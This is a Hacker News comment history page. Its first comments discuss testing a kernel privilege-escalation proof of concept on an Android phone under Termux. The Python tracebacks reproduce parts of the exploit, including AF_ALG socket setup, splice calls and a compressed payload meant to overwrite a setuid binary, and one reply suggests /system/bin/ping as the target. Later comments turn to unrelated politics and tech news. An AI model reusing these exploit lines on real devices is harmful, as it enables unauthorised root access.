Hacker News | int0x29's comments

Edit: Ignore this, I overlooked calling order. It is indeed blocked.

~~My allegedly fully patched Pixel 8 Pro allowed an AF_ALG socket to open under Termux without virtualization so I'm not sure the last bit is true~~


I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user-accessible setuid binary for it to work.

    Traceback (most recent call last):
      File "/data/data/com.termux/files/home/exploit.py", line 8, in <module>
        f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
          ^^^^^^^^^^^^^^^^^^^^^^^
    FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'


Try /system/bin/ping

Now the socket is blocked. Also probably should have realized the socket is defined earlier than it's called.

    Traceback (most recent call last):
      File "/data/data/com.termux/files/home/exploit.py", line 9, in <module>
        while i<len(e):c(f,i,e[i:i+4]);i+=4
                       ^^^^^^^^^^^^^^^
      File "/data/data/com.termux/files/home/exploit.py", line 5, in c
        a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
          ^^^^^^^^^^^^^^^^
      File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__
        _socket.socket.__init__(self, family, type, proto, fileno)
    PermissionError: [Errno 13] Permission denied


PoC is also x86_64 only and not arm.

It's not writing to the partition though, is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.

I assumed such memory would be mapped readonly (PROT_READ), without actually looking into it..

Has anyone posted the Windows service file yet? That looks just to be the loader.

No I haven't found it yet. AFAIK MalwareBazaar (right now I cannot access the website) only has two files, one .exe and another one some 30K.

Firefox had it in 2010. I don't remember when IE ditched it.


Historically they've gotten backpay. Also they are trying to keep their jobs.


I’m not sure historical precedent tells us a whole lot and Congress has now skipped Washington. It’s hard to say when this will be resolved. It could be a month or more.


This looks like an existing pre-planned product hastily rebranded AI


Last I used OSX (the version prior to the current latest IIRC) not all of the "suggestions" could be turned off


Don't worry, CISA and any other involved regulator were gutted by DOGE.


Is that true or you’re just assuming it’s so?


It’s true, and briefly made the news at the time[1]. The CSRB was also decimated, and the current DHS deputy secretary, in his confirmation hearing, called for wrecking the agency, as he disagrees with their efforts to maintain election security.

---

[1] https://techcrunch.com/2025/03/11/doge-axes-cisa-red-team-st...


I definitely remember DOGE gutting CISA. Other cuts were not always due to DOGE. A good chunk of the FBI's computer security and counter intelligence people got reassigned to immigration enforcement. The committee investigating the US cell network hacks got cut extensively but I don't remember who did it.


Telcos already have strong teams themselves who monitor towers.


Regardless, China was monitoring everything very easily.

https://www.pcmag.com/news/chinas-salt-typhoon-hacked-at-lea...



Ars just republished it under license

